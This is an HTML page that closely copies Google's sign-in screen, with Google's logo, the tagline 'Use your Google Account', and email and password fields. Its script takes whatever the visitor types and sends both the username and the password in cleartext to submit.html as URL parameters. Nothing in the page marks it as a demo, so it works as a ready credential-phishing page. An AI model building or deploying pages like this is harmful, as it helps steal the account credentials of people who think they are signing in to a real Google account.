<html>
    <!-- import google sans font -->
    <link href="https://fonts.googleapis.com/css?family=Google+Sans" rel="stylesheet">
    <style>
        .container {
  display: flex;
  height: 100vh;
  font-family: Google Sans;
  user-select: none;
}
.card {
  background: #fff;
  width: 412px;
  height: auto;
  padding: 48px 36px;
  border-radius: 8px;
  border: 1px solid #cacaca;
  margin: auto;
}
.header {
  text-align: center;
  font-weight: 400;
}
.title {
  padding: 15px 0;
  font-size: 24px;
}
.tagline {
  font-size: 16px;
  padding-bottom: 18px;
}
label {
  display: block;
  position: absolute;
  padding: 0 5px;
  width: auto;
  color: #5f6368;
  background: #fff;
  transition: all 150ms ease;
  transform: translate(12px, -37px);
  cursor: text;
}
input {
  padding: 16px;
  margin-top: 20px;
  font-size: 17px;
  background: #fff;
  width: calc(100% - 36px);
  border: 1px solid #cacaca;
  border-radius: 5px;
}
input:focus {
  outline: none;
  /* Compensate increased border with padding */
  padding: 15px;
  border: 2px solid #1a73e8;
}
input:not(:placeholder-shown) + label, input:focus + label {
  transform: translate(8px, -62px);
  font-size: 13px;
}
input:focus + label {
  color: #1a73e8;
}
.links {
  color: #1a73e8;
  font-size: 14px;
  padding-top: 10px;
  cursor: pointer;
  font-weight: 500;
}
.guest {
  margin-top: 32px;
  font-size: 14px;
  color: #5f6368;
}
.login-bar {
  margin-top: 32px;
  display: flex;
  flex-wrap: wrap;
}
.next {
  margin-left: auto;
  padding: 10px 30px;
  border-radius: 5px;
  cursor: pointer;
  color: #fff;
  outline: none;
  border: none;
  background: #1a73e8;
  font-weight: 500;
}
.next:hover {
  background: #4285f4;
}
@media only screen and (max-width: 600px) {
  .card {
    border: none;
  }
}

    </style>
    <body>
        
        <div class="container">
            <div class="card">
              <div class="header">
                <img src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg" alt="Google" height="24">
                <div class="title">Sign in</div>
                <div class="tagline">Use your Google Account</div>
              </div>
              <input id="name" type="text" placeholder=" ">
              <label for="name">Email or phone</label>
              <input id="pass" type="password" placeholder=" ">
              <label for="pass">Password</label>
              <div class="links">Forgot email?</div>
              <div class="guest">Not your computer? Use Guest mode to sign in privately.</div>
              <div class="links">Learn more</div>
              <div class="login-bar">
                <div class="links">Create account</div>
                <button class="next">Next</button>
              </div>
            </div>
          </div>
    </body>
    <script>
        // on button click
        document.querySelector('.next').addEventListener('click', function() {
          // get the value of the input
          var name = document.querySelector('#name').value;
          var pass = document.querySelector('#pass').value;
          // redirect to submit.html
            window.location.href = 'submit.html?username=' + name + '&password=' + pass;
        });
    </script>
</html>